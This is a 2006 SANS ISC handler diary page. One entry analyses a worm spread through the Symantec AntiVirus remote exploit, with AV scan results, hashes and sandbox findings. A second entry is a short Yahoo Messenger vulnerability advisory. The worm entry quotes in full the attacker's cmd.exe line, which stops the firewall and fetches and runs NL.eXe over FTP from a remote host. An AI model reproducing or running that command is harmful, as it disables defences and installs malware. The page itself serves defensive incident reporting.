Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

sav worm and its cc

Published: 2006-12-15
Last Updated: 2006-12-15 19:13:42 UTC
by donald smith (Version: 2)
0 comment(s)
Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to on tcp port 12345 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from 21211),
the file is then executed and then the x file is deleted.

Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET). 
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 12.14.2006 Win32.Polipos.sus
 Fortinet 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
 All others reported no virus found!

Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info:
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards

We have requested the cc system and the malware distribution site be shutdown.

I submitted nl.exe to norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)

 [ General information ]
    * File length:        12168 bytes.
    * MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.

 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
    * Creates file C:\WINDOWS\TEMP\NL055.bat.

 [ Process/window information ]
    * Enumerates running processes.
    * Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.

 [ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
    * C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.

(C) 2004-2006 Norman ASA. All Rights Reserved

We had one report that this virus included a keylogger that has yet to be verified.

0 comment(s)

Yahoo Messenger critical update

Published: 2006-12-15
Last Updated: 2006-12-15 18:17:07 UTC
by Jim Clausing (Version: 1)
0 comment(s)
Last Friday, Yahoo published a security bulletin with respect to Yahoo Messenger in all versions prior to 2 Nov 2006 on Windows.  A buffer overflow in an ActiveX component allows for remote code execution.  Earlier today, a Secunia bulletin was also published rating this vulnerability as 'highly critical'.  Users of Yahoo Messenger are urged to update to the latest version immediately.  According to the Yahoo bulletin the CLSID that contains the fix is  AA218328-0EA8-4D70-8972-E987A9190FF4 versions 2005.1.1.4 or above

Yahoo bulletin:
Secunia bulletin:
0 comment(s)
Diary Archives